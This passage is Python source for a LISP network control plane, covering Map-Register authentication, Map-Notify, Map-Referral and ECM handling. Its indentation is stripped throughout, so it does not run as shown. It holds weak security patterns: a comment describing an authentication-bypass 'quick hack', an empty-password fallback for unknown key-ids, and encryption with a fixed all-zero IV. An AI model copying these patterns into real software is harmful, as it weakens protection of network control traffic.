match_str = site_eid.print_eid_tuple() if site_eid else None
#
        # Allow overlapping ams registered prefixes. Make sure we get the
        # configured parent entry and not the registered more-specific. This
        # registration could be a more-specific of an already registered
        # more-specific entry.
#
if (site_eid and site_eid.accept_more_specifics == False):
if (site_eid.eid_record_matches(eid_record) == False):
parent = site_eid.parent_for_more_specifics
if (parent): site_eid = parent
#endif
#endif
#
# Check if this is a new more-specific EID-prefix registration that
# will match a static configured site-eid with "accept-more-specifics"
# configured.
#
ams = (site_eid and site_eid.accept_more_specifics)
if (ams):
ms_site_eid = lisp_site_eid(site_eid.site)
ms_site_eid.dynamic = True
ms_site_eid.eid.copy_address(eid_record.eid)
ms_site_eid.group.copy_address(eid_record.group)
ms_site_eid.parent_for_more_specifics = site_eid
ms_site_eid.add_cache()
ms_site_eid.inherit_from_ams_parent()
site_eid.more_specific_registrations.append(ms_site_eid)
site_eid = ms_site_eid
else:
site_eid = lisp_site_eid_lookup(eid_record.eid, eid_record.group,
True)
#endif
eid_str = eid_record.print_eid_tuple()
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(" {} for EID {}{}".format(notfound, green(eid_str, False),
", matched non-ams {}".format(green(match_str, False) if \
match_str else "")))
#
# Need to hop over RLOC-set so we can get to the next EID-record.
#
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
site = site_eid.site
if (ams):
e = site_eid.parent_for_more_specifics.print_eid_tuple()
lprint(" Found ams {} for site '{}' for registering prefix {}". \
format(green(e, False), site.site_name, green(eid_str, False)))
else:
e = green(site_eid.print_eid_tuple(), False)
lprint(" Found {} for site '{}' for registering prefix {}". \
format(e, site.site_name, green(eid_str, False)))
#endif
#
# Check if site configured in admin-shutdown mode.
#
if (site.shutdown):
lprint((" Rejecting registration for site '{}', configured in " +
"admin-shutdown state").format(site.site_name))
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
continue
#endif
#
# Verify authentication before processing locator-set. Quick hack
# while I figure out why sha1 and sha2 authentication is not working
# from cisco. An NX-OS Map-Register will have a 0 nonce. We are going
# to use this to bypass the authentication check.
#
key_id = map_register.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(orig_packet, map_register.alg_id,
map_register.auth_data, password)
dynamic = "dynamic " if site_eid.dynamic else ""
passfail = bold("passed" if auth_good else "failed", False)
key_id = "key-id {}".format(key_id) if key_id == map_register.key_id \
else "bad key-id {}".format(map_register.key_id)
lprint(" Authentication {} for {}EID-prefix {}, {}".format( \
passfail, dynamic, green(eid_str, False), key_id))
#
# If the IPv6 EID is a CGA, verify signature if it exists in an
# RLOC-record.
#
cga_good = True
is_crypto_eid = (lisp_get_eid_hash(eid_record.eid) != None)
if (is_crypto_eid or site_eid.require_signature):
required = "Required " if site_eid.require_signature else ""
eid_str = green(eid_str, False)
rloc = lisp_find_sig_in_rloc_set(packet, eid_record.rloc_count)
if (rloc == None):
cga_good = False
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}, no signature found").format(required,
bold("failed", False), eid_str))
else:
cga_good = lisp_verify_cga_sig(eid_record.eid, rloc)
passfail = bold("passed" if cga_good else "failed", False)
lprint((" {}EID-crypto-hash signature verification {} " + \
"for EID-prefix {}").format(required, passfail, eid_str))
#endif
#endif
if (auth_good == False or cga_good == False):
packet = rloc_record.end_of_rlocs(packet, eid_record.rloc_count)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
continue
#endif
#
        # If merge is being requested, get individual site-eid. If not, and what
# was cached had merge bit set, set flag to issue error.
#
if (map_register.merge_register_requested):
parent = site_eid
parent.inconsistent_registration = False
#
# Clear out all registrations, there is a new site-id registering.
# Or there can be multiple sites registering for a multicast (S,G).
#
if (site_eid.group.is_null()):
if (parent.site_id != map_register.site_id):
parent.site_id = map_register.site_id
parent.registered = False
parent.individual_registrations = {}
parent.registered_rlocs = []
lisp_registered_count -= 1
#endif
#endif
key = source.address + map_register.xtr_id
if (site_eid.individual_registrations.has_key(key)):
site_eid = site_eid.individual_registrations[key]
else:
site_eid = lisp_site_eid(site)
site_eid.eid.copy_address(parent.eid)
site_eid.group.copy_address(parent.group)
site_eid.encrypt_json = parent.encrypt_json
parent.individual_registrations[key] = site_eid
#endif
else:
site_eid.inconsistent_registration = \
site_eid.merge_register_requested
#endif
site_eid.map_registers_received += 1
#
        # If TTL is 0, unregister entry if source of Map-Register is in the
# list of currently registered RLOCs.
#
bad = (site_eid.is_rloc_in_rloc_set(source) == False)
if (eid_record.record_ttl == 0 and bad):
lprint(" Ignore deregistration request from {}".format( \
red(source.print_address_no_iid(), False)))
continue
#endif
#
# Clear out previously stored RLOCs. Put new ones in if validated
# against configured ones.
#
previous_rlocs = site_eid.registered_rlocs
site_eid.registered_rlocs = []
#
# Process each RLOC record in EID record.
#
start_rloc_records = packet
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None, site_eid.encrypt_json)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Register packet")
return
#endif
rloc_record.print_record(" ")
#
# Run RLOC in Map-Register against configured RLOC policies.
#
if (len(site.allowed_rlocs) > 0):
addr_str = rloc_record.rloc.print_address()
if (site.allowed_rlocs.has_key(addr_str) == False):
lprint((" Reject registration, RLOC {} not " + \
"configured in allowed RLOC-set").format( \
red(addr_str, False)))
site_eid.registered = False
packet = rloc_record.end_of_rlocs(packet,
eid_record.rloc_count - j - 1)
break
#endif
#endif
#
            # RLOC validated as good. Otherwise, go to the next EID record.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, source)
#
# If the source of the Map-Register is in the locator-set, then
# store if it wants Map-Notify messages when a new locator-set
# is registered later.
#
if (source.is_exact_match(rloc.rloc)):
rloc.map_notify_requested = map_register.map_notify_requested
#endif
#
# Add to RLOC set for site-eid.
#
site_eid.registered_rlocs.append(rloc)
#endfor
changed_rloc_set = \
(site_eid.do_rloc_sets_match(previous_rlocs) == False)
#
# Do not replace RLOCs if the Map-Register is a refresh and the
# locator-set is different.
#
if (map_register.map_register_refresh and changed_rloc_set and
site_eid.registered):
lprint(" Reject registration, refreshes cannot change RLOC-set")
site_eid.registered_rlocs = previous_rlocs
continue
#endif
#
# Copy fields from packet into internal data structure. First set
# site EID specific state.
#
if (site_eid.registered == False):
site_eid.first_registered = lisp_get_timestamp()
lisp_registered_count += 1
#endif
site_eid.last_registered = lisp_get_timestamp()
site_eid.registered = (eid_record.record_ttl != 0)
site_eid.last_registerer = source
#
# Now set site specific state.
#
site_eid.auth_sha1_or_sha2 = sha1_or_sha2
site_eid.proxy_reply_requested = map_register.proxy_reply_requested
site_eid.lisp_sec_present = map_register.lisp_sec_present
site_eid.map_notify_requested = map_register.map_notify_requested
site_eid.mobile_node_requested = map_register.mobile_node
site_eid.merge_register_requested = \
map_register.merge_register_requested
site_eid.use_register_ttl_requested = map_register.use_ttl_for_timeout
if (site_eid.use_register_ttl_requested):
site_eid.register_ttl = eid_record.store_ttl()
else:
site_eid.register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
#endif
site_eid.xtr_id_present = map_register.xtr_id_present
if (site_eid.xtr_id_present):
site_eid.xtr_id = map_register.xtr_id
site_eid.site_id = map_register.site_id
#endif
#
# If merge requested, do it now for this EID-prefix.
#
if (map_register.merge_register_requested):
if (parent.merge_in_site_eid(site_eid)):
rle_list.append([eid_record.eid, eid_record.group])
#endif
if (map_register.map_notify_requested):
lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record)
#endif
#endif
if (changed_rloc_set == False): continue
if (len(rle_list) != 0): continue
eid_list.append(site_eid.print_eid_tuple())
#
        # Send Map-Notify if the RLOC-set changed for this site-eid. Send it
# to the previously registered RLOCs only if they requested it. Do
# not consider RLOC-sets with RLEs in them because at the end of
# the EID-record loop, we'll send a multicast Map-Notify.
#
eid_record = eid_record.encode()
eid_record += start_rloc_records
el = [site_eid.print_eid_tuple()]
lprint(" Changed RLOC-set, Map-Notifying old RLOC-set")
for rloc in previous_rlocs:
if (rloc.map_notify_requested == False): continue
if (rloc.rloc.is_exact_match(source)): continue
lisp_build_map_notify(lisp_sockets, eid_record, el, 1, rloc.rloc,
LISP_CTRL_PORT, map_register.nonce, map_register.key_id,
map_register.alg_id, map_register.auth_len, site, False)
#endfor
#
# Check subscribers.
#
lisp_notify_subscribers(lisp_sockets, eid_record, site_eid.eid, site)
#endfor
#
    # Send Map-Notify to ITRs if any (S,G) RLE has changed.
#
if (len(rle_list) != 0):
lisp_queue_multicast_map_notify(lisp_sockets, rle_list)
#endif
#
    # The merged Map-Notify will serve as a Map-Register ack, so we don't need
# to send another one below.
#
if (map_register.merge_register_requested): return
#
# Should we ack the Map-Register? Only if the Want-Map-Notify bit was set
# by the registerer.
#
if (map_register.map_notify_requested and site != None):
lisp_build_map_notify(lisp_sockets, start_eid_records, eid_list,
map_register.record_count, source, sport, map_register.nonce,
map_register.key_id, map_register.alg_id, map_register.auth_len,
site, True)
#endif
return
#enddef
#
# lisp_process_multicast_map_notify
#
# Have the ITR process receive a multicast Map-Notify message. We will update
# the map-cache with a new RLE for the (S,G) entry. We do not have to
# authenticate the Map-Notify or send a Map-Notify-Ack since the lisp-etr
# process has already done so.
#
def lisp_process_multicast_map_notify(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
if (map_notify.record_count == 0): return
eid_records = map_notify.eid_records
for i in range(map_notify.record_count):
eid_record = lisp_eid_record()
eid_records = eid_record.decode(eid_records)
        if (eid_records == None): return
eid_record.print_record(" ", False)
#
# Get or create map-cache entry for (S,G).
#
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
if (mc == None):
allow, x, y = lisp_allow_gleaning(eid_record.eid, eid_record.group,
None)
if (allow == False): continue
mc = lisp_mapping(eid_record.eid, eid_record.group, [])
mc.add_cache()
#endif
#
        # Gleaned map-cache entries always override what is registered in
        # the mapping system, since the mapping system RLE entries are RTRs
        # and RTRs store gleaned mappings for group members.
#
if (mc.gleaned):
lprint("Ignore Map-Notify for gleaned {}".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
mc.mapping_source = None if source == "lisp-etr" else source
mc.map_cache_ttl = eid_record.store_ttl()
#
# If no RLOCs in the Map-Notify and we had RLOCs in the existing
# map-cache entry, remove them.
#
if (len(mc.rloc_set) != 0 and eid_record.rloc_count == 0):
mc.rloc_set = []
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with no RLOC-set".format( \
green(mc.print_eid_tuple(), False)))
continue
#endif
rtr_mc = mc.rtrs_in_rloc_set()
#
# If there are RTRs in the RLOC set for an existing map-cache entry,
# only put RTR RLOCs from the Map-Notify in the map-cache.
#
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
eid_records = rloc_record.decode(eid_records, None)
rloc_record.print_record(" ")
if (eid_record.group.is_null()): continue
if (rloc_record.rle == None): continue
#
# Get copy of stats from old stored record so the display can
# look continuous even though the physical pointer is changing.
#
stats = mc.rloc_set[0].stats if len(mc.rloc_set) != 0 else None
#
# Store in map-cache.
#
rloc = lisp_rloc()
rloc.store_rloc_from_record(rloc_record, None, mc.mapping_source)
if (stats != None): rloc.stats = copy.deepcopy(stats)
if (rtr_mc and rloc.is_rtr() == False): continue
mc.rloc_set = [rloc]
mc.build_best_rloc_set()
lisp_write_ipc_map_cache(True, mc)
lprint("Update {} map-cache entry with RLE {}".format( \
green(mc.print_eid_tuple(), False),
rloc.rle.print_rle(False, True)))
#endfor
#endfor
return
#enddef
#
# lisp_process_map_notify
#
# Process Map-Notify message. All that needs to be done is to validate it with
# the Map-Server that sent it and return a Map-Notify-Ack.
#
def lisp_process_map_notify(lisp_sockets, orig_packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(orig_packet)
if (packet == None):
lprint("Could not decode Map-Notify packet")
return
#endif
map_notify.print_notify()
#
    # Get map-server so we can do statistics and find auth-key, if an auth-key
# was provided in a Map-Notify message.
#
s = source.print_address()
if (map_notify.alg_id != 0 or map_notify.auth_len != 0):
ms = None
for key in lisp_map_servers_list:
if (key.find(s) == -1): continue
ms = lisp_map_servers_list[key]
#endfor
if (ms == None):
lprint((" Could not find Map-Server {} to authenticate " + \
"Map-Notify").format(s))
return
#endif
ms.map_notifies_received += 1
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, ms.password)
lprint(" Authentication {} for Map-Notify".format("succeeded" if \
auth_good else "failed"))
if (auth_good == False): return
else:
ms = lisp_ms(s, None, "", 0, "", False, False, False, False, 0, 0, 0,
None)
#endif
#
    # Send out Map-Notify-Ack. Skip over packet so lisp_send_map_notify_ack()
# starts the packet with EID-records.
#
eid_records = map_notify.eid_records
if (map_notify.record_count == 0):
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#endif
#
# If this is a Map-Notify for an (S,G) entry, send the message to the
# lisp-itr process so it can update its map-cache for an active source
# in this site. There is probably a RLE change that the ITR needs to know
# about.
#
eid_record = lisp_eid_record()
packet = eid_record.decode(eid_records)
if (packet == None): return
eid_record.print_record(" ", False)
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint(" Could not decode RLOC-record in Map-Notify packet")
return
#endif
rloc_record.print_record(" ")
#endfor
#
# Right now, don't do anything with non-multicast EID records.
#
if (eid_record.group.is_null() == False):
#
# Forward to lisp-itr process via the lisp-core process so multicast
# Map-Notify messages are processed by the ITR process.
#
lprint("Send {} Map-Notify IPC message to ITR process".format( \
green(eid_record.print_eid_tuple(), False)))
ipc = lisp_control_packet_ipc(orig_packet, s, "lisp-itr", 0)
lisp_ipc(ipc, lisp_sockets[2], "lisp-core-pkt")
#endif
#
# Send Map-Notify-Ack after processing contents of Map-Notify.
#
lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms)
return
#enddef
#
# lisp_process_map_notify_ack
#
# Process received Map-Notify-Ack. This causes the Map-Notify to be removed
# from the lisp_map_notify_queue{}.
#
def lisp_process_map_notify_ack(packet, source):
map_notify = lisp_map_notify("")
packet = map_notify.decode(packet)
if (packet == None):
lprint("Could not decode Map-Notify-Ack packet")
return
#endif
map_notify.print_notify()
#
# Get an EID-prefix out of the Map-Notify-Ack so we can find the site
# associated with it.
#
if (map_notify.record_count < 1):
lprint("No EID-prefix found, cannot authenticate Map-Notify-Ack")
return
#endif
eid_record = lisp_eid_record()
if (eid_record.decode(map_notify.eid_records) == None):
lprint("Could not decode EID-record, cannot authenticate " +
"Map-Notify-Ack")
return
    #endif
eid_record.print_record(" ", False)
eid_str = eid_record.print_eid_tuple()
#
# Find site associated with EID-prefix from first record.
#
if (map_notify.alg_id != LISP_NONE_ALG_ID and map_notify.auth_len != 0):
site_eid = lisp_sites_by_eid.lookup_cache(eid_record.eid, True)
if (site_eid == None):
notfound = bold("Site not found", False)
lprint(("{} for EID {}, cannot authenticate Map-Notify-Ack"). \
format(notfound, green(eid_str, False)))
return
#endif
site = site_eid.site
#
# Count it.
#
site.map_notify_acks_received += 1
key_id = map_notify.key_id
if (site.auth_key.has_key(key_id)):
password = site.auth_key[key_id]
else:
password = ""
#endif
auth_good = lisp_verify_auth(packet, map_notify.alg_id,
map_notify.auth_data, password)
key_id = "key-id {}".format(key_id) if key_id == map_notify.key_id \
else "bad key-id {}".format(map_notify.key_id)
lprint(" Authentication {} for Map-Notify-Ack, {}".format( \
"succeeded" if auth_good else "failed", key_id))
if (auth_good == False): return
#endif
#
# Remove Map-Notify from retransmission queue.
#
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
etr = source.print_address()
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue.pop(key)
if (map_notify.retransmit_timer): map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
else:
lprint("Map-Notify with nonce 0x{} queue entry not found for {}". \
format(map_notify.nonce_key, red(etr, False)))
#endif
return
#enddef
#
# lisp_map_referral_loop
#
# Check to see if the arrived Map-Referral EID-prefix is more-specific than the
# last one we received.
#
def lisp_map_referral_loop(mr, eid, group, action, s):
if (action not in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)): return(False)
if (mr.last_cached_prefix[0] == None): return(False)
#
# Check group first, if any. Then EID-prefix as source if (S,G).
#
loop = False
if (group.is_null() == False):
loop = mr.last_cached_prefix[1].is_more_specific(group)
#endif
if (loop == False):
loop = mr.last_cached_prefix[0].is_more_specific(eid)
#endif
if (loop):
prefix_str = lisp_print_eid_tuple(eid, group)
cached_str = lisp_print_eid_tuple(mr.last_cached_prefix[0],
mr.last_cached_prefix[1])
lprint(("Map-Referral prefix {} from {} is not more-specific " + \
"than cached prefix {}").format(green(prefix_str, False), s,
cached_str))
#endif
return(loop)
#enddef
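#
# Illustrative example of the check above: if the last cached prefix for
# this Map-Request was 10.1.0.0/16 and a new referral arrives covering
# 10.0.0.0/8, the cached prefix is more-specific than the arriving one, so
# the referral is not making forward progress and a loop is declared.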
#
# lisp_process_map_referral
#
# This function processes a Map-Referral message by a Map-Resolver.
#
def lisp_process_map_referral(lisp_sockets, packet, source):
map_referral = lisp_map_referral()
packet = map_referral.decode(packet)
if (packet == None):
lprint("Could not decode Map-Referral packet")
return
#endif
map_referral.print_map_referral()
s = source.print_address()
nonce = map_referral.nonce
#
    # Process each EID record in Map-Referral message.
#
for i in range(map_referral.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Referral packet")
return
#endif
eid_record.print_record(" ", True)
#
# Check if we have an outstanding request for this Map-Referral reply.
#
key = str(nonce)
if (key not in lisp_ddt_map_requestQ):
lprint(("Map-Referral nonce 0x{} from {} not found in " + \
"Map-Request queue, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
mr = lisp_ddt_map_requestQ[key]
if (mr == None):
lprint(("No Map-Request queue entry found for Map-Referral " +
"nonce 0x{} from {}, EID-record ignored").format( \
lisp_hex_string(nonce), s))
continue
#endif
#
        # Check for Map-Referral looping. If there is no loop, cache the EID
# returned from the Map-Referral in the Map-Request queue entry.
#
if (lisp_map_referral_loop(mr, eid_record.eid, eid_record.group,
eid_record.action, s)):
mr.dequeue_map_request()
continue
#endif
mr.last_cached_prefix[0] = eid_record.eid
mr.last_cached_prefix[1] = eid_record.group
#
# Lookup referral in referral-cache.
#
add_or_replace = False
referral = lisp_referral_cache_lookup(eid_record.eid, eid_record.group,
True)
if (referral == None):
add_or_replace = True
referral = lisp_referral()
referral.eid = eid_record.eid
referral.group = eid_record.group
if (eid_record.ddt_incomplete == False): referral.add_cache()
elif (referral.referral_source.not_set()):
lprint("Do not replace static referral entry {}".format( \
green(referral.print_eid_tuple(), False)))
mr.dequeue_map_request()
continue
#endif
action = eid_record.action
referral.referral_source = source
referral.referral_type = action
ttl = eid_record.store_ttl()
referral.referral_ttl = ttl
referral.expires = lisp_set_timestamp(ttl)
#
# Mark locator up if the Map-Referral source is in the referral-set.
#
negative = referral.is_referral_negative()
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
if (ref_node.updown == False and negative == False):
ref_node.updown = True
lprint("Change up/down status for referral-node {} to up". \
format(s))
elif (ref_node.updown == True and negative == True):
ref_node.updown = False
lprint(("Change up/down status for referral-node {} " + \
"to down, received negative referral").format(s))
#endif
#endif
#
# Set dirty-bit so we can remove referral-nodes from cached entry
        # that weren't in the packet.
#
dirty_set = {}
for key in referral.referral_set: dirty_set[key] = None
#
# Process each referral RLOC-record in EID record.
#
for i in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Referral packet")
return
#endif
rloc_record.print_record(" ")
#
# Copy over existing referral-node
#
addr_str = rloc_record.rloc.print_address()
if (referral.referral_set.has_key(addr_str) == False):
ref_node = lisp_referral_node()
ref_node.referral_address.copy_address(rloc_record.rloc)
referral.referral_set[addr_str] = ref_node
if (s == addr_str and negative): ref_node.updown = False
else:
ref_node = referral.referral_set[addr_str]
if (dirty_set.has_key(addr_str)): dirty_set.pop(addr_str)
#endif
ref_node.priority = rloc_record.priority
ref_node.weight = rloc_record.weight
#endfor
#
# Now remove dirty referral-node entries.
#
for key in dirty_set: referral.referral_set.pop(key)
eid_str = referral.print_eid_tuple()
if (add_or_replace):
if (eid_record.ddt_incomplete):
lprint("Suppress add {} to referral-cache".format( \
green(eid_str, False)))
else:
lprint("Add {}, referral-count {} to referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
else:
lprint("Replace {}, referral-count: {} in referral-cache".format( \
green(eid_str, False), eid_record.rloc_count))
#endif
#
# Process actions.
#
if (action == LISP_DDT_ACTION_DELEGATION_HOLE):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
if (action == LISP_DDT_ACTION_NOT_AUTH):
if (mr.tried_root):
lisp_send_negative_map_reply(mr.lisp_sockets, referral.eid,
referral.group, mr.nonce, mr.itr, mr.sport, 0, None, False)
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, True)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG):
if (referral.referral_set.has_key(s)):
ref_node = referral.referral_set[s]
ref_node.updown = False
#endif
if (len(referral.referral_set) == 0):
mr.dequeue_map_request()
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action in (LISP_DDT_ACTION_NODE_REFERRAL,
LISP_DDT_ACTION_MS_REFERRAL)):
if (mr.eid.is_exact_match(eid_record.eid)):
if (not mr.tried_root):
lisp_send_ddt_map_request(mr, True)
else:
lisp_send_negative_map_reply(mr.lisp_sockets,
referral.eid, referral.group, mr.nonce, mr.itr,
mr.sport, 15, None, False)
mr.dequeue_map_request()
#endif
else:
lisp_send_ddt_map_request(mr, False)
#endif
#endif
if (action == LISP_DDT_ACTION_MS_ACK): mr.dequeue_map_request()
#endfor
return
#enddef
#
# lisp_process_ecm
#
# Process a received Encapsulated-Control-Message. It is assumed for right now
# that all ECMs have a Map-Request embedded.
#
def lisp_process_ecm(lisp_sockets, packet, source, ecm_port):
ecm = lisp_ecm(0)
packet = ecm.decode(packet)
if (packet == None):
lprint("Could not decode ECM packet")
return
#endif
ecm.print_ecm()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return
#endif
packet_type = header.type
del(header)
if (packet_type != LISP_MAP_REQUEST):
lprint("Received ECM without Map-Request inside")
return
#endif
#
# Process Map-Request.
#
mr_port = ecm.udp_sport
timestamp = time.time()
lisp_process_map_request(lisp_sockets, packet, source, ecm_port,
ecm.source, mr_port, ecm.ddt, -1, timestamp)
return
#enddef
#------------------------------------------------------------------------------
#
# lisp_send_map_register
#
# Compute authentication for the Map-Register message and send it to the
# supplied Map-Server.
#
def lisp_send_map_register(lisp_sockets, packet, map_register, ms):
#
# If we are doing LISP-Decent and have a multicast group configured as
    # a Map-Server, we can't join the group by sending to the group, so we have
# send to the loopback address to bootstrap our membership. We join to
# one other member of the peer-group so we can get the group membership.
#
dest = ms.map_server
if (lisp_decent_push_configured and dest.is_multicast_address() and
(ms.map_registers_multicast_sent == 1 or ms.map_registers_sent == 1)):
dest = copy.deepcopy(dest)
dest.address = 0x7f000001
b = bold("Bootstrap", False)
g = ms.map_server.print_address_no_iid()
lprint("{} mapping system for peer-group {}".format(b, g))
#endif
#
# Modify authentication hash in Map-Register message if supplied when
# lisp_map_register() was called.
#
packet = lisp_compute_auth(packet, map_register, ms.password)
#
    # Should we encrypt the Map-Register? Use a 16-byte key, which is
    # 32 string characters.
#
if (ms.ekey != None):
ekey = ms.ekey.zfill(32)
iv = "0" * 8
ciphertext = chacha.ChaCha(ekey, iv).encrypt(packet[4::])
packet = packet[0:4] + ciphertext
e = bold("Encrypt", False)
lprint("{} Map-Register with key-id {}".format(e, ms.ekey_id))
#endif
decent = ""
if (lisp_decent_pull_xtr_configured()):
decent = ", decent-index {}".format(bold(ms.dns_name, False))
#endif
lprint("Send Map-Register to map-server {}{}{}".format( \
dest.print_address(), ", ms-name '{}'".format(ms.ms_name), decent))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_ipc_to_core
#
# Send a LISP control packet that is to be sourced from UDP port 4342 to
# the lisp-core process.
#
def lisp_send_ipc_to_core(lisp_socket, packet, dest, port):
source = lisp_socket.getsockname()
dest = dest.print_address_no_iid()
lprint("Send IPC {} bytes to {} {}, control-packet: {}".format( \
len(packet), dest, port, lisp_format_packet(packet)))
packet = lisp_control_packet_ipc(packet, source, dest, port)
lisp_ipc(packet, lisp_socket, "lisp-core-pkt")
return
#enddef
#
# lisp_send_map_reply
#
# Send Map-Reply message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_reply(lisp_sockets, packet, dest, port):
lprint("Send Map-Reply to {}".format(dest.print_address_no_iid()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_referral
#
# Send Map-Referral message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_referral(lisp_sockets, packet, dest, port):
lprint("Send Map-Referral to {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_map_notify
#
# Send Map-Notify message to supplied destination. Note the destination must
# be routable in RLOC space.
#
def lisp_send_map_notify(lisp_sockets, packet, dest, port):
lprint("Send Map-Notify to xTR {}".format(dest.print_address()))
lisp_send_ipc_to_core(lisp_sockets[2], packet, dest, port)
return
#enddef
#
# lisp_send_ecm
#
# Send Encapsulated Control Message.
#
def lisp_send_ecm(lisp_sockets, packet, inner_source, inner_sport, inner_dest,
outer_dest, to_etr=False, to_ms=False, ddt=False):
if (inner_source == None or inner_source.is_null()):
inner_source = inner_dest
#endif
#
    # For sending Map-Requests, if NAT-traversal is configured, use the same
    # socket that was used to send the Info-Request.
#
if (lisp_nat_traversal):
sport = lisp_get_any_translated_port()
if (sport != None): inner_sport = sport
#endif
ecm = lisp_ecm(inner_sport)
ecm.to_etr = to_etr if lisp_is_running("lisp-etr") else False
ecm.to_ms = to_ms if lisp_is_running("lisp-ms") else False
ecm.ddt = ddt
ecm_packet = ecm.encode(packet, inner_source, inner_dest)
if (ecm_packet == None):
lprint("Could not encode ECM message")
return
#endif
ecm.print_ecm()
packet = ecm_packet + packet
addr_str = outer_dest.print_address_no_iid()
lprint("Send Encapsulated-Control-Message to {}".format(addr_str))
dest = lisp_convert_4to6(addr_str)
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#------------------------------------------------------------------------------
#
# Below are constant definitions used for internal data structures.
#
LISP_AFI_GEO_COORD = -3
LISP_AFI_IID_RANGE = -2
LISP_AFI_ULTIMATE_ROOT = -1
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17
LISP_AFI_LCAF = 16387
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3
#------------------------------------------------------------------------------
#
# This is a general address format for EIDs, RLOCs, EID-prefixes in any AFI or
# LCAF format.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
#
# byte_swap_64
#
# Byte-swap a 64-bit number.
#
def byte_swap_64(address):
addr = \
((address & 0x00000000000000ff) << 56) | \
((address & 0x000000000000ff00) << 40) | \
((address & 0x0000000000ff0000) << 24) | \
((address & 0x00000000ff000000) << 8) | \
((address & 0x000000ff00000000) >> 8) | \
((address & 0x0000ff0000000000) >> 24) | \
((address & 0x00ff000000000000) >> 40) | \
((address & 0xff00000000000000) >> 56)
return(addr)
#enddef
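#
# As an illustrative example (not executed), byte_swap_64() reverses the
# byte order of a 64-bit value:
#
#   byte_swap_64(0x0123456789abcdef) -> 0xefcdab8967452301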
#
# lisp_cache is a data structure to implement a multi-way tree. The first
# level array is an associative array of mask-lengths. Then each mask-length
# entry will be an associative array of the following key:
#
# <32-bit-instance-id> <16-bit-address-family> <eid-prefix>
#
# Data structure:
# self.cache{}
# self.cache_sorted[]
# self.cache{}.entries{}
# self.cache{}.entries_sorted[]
#
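# As an illustrative example, an IPv4 EID-prefix [1000]10.0.0.0/8 is stored
# by lisp_cache.build_key() below under mask-length key 8 + 48 = 56 with
# lookup key "000003e8" + "0001" + "0a000000", i.e. the zero-filled hex
# instance-ID, AFI, and address concatenated together.
#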
class lisp_cache_entries():
def __init__(self):
self.entries = {}
self.entries_sorted = []
#enddef
#endclass
class lisp_cache():
def __init__(self):
self.cache = {}
self.cache_sorted = []
self.cache_count = 0
#enddef
def cache_size(self):
return(self.cache_count)
#enddef
def build_key(self, prefix):
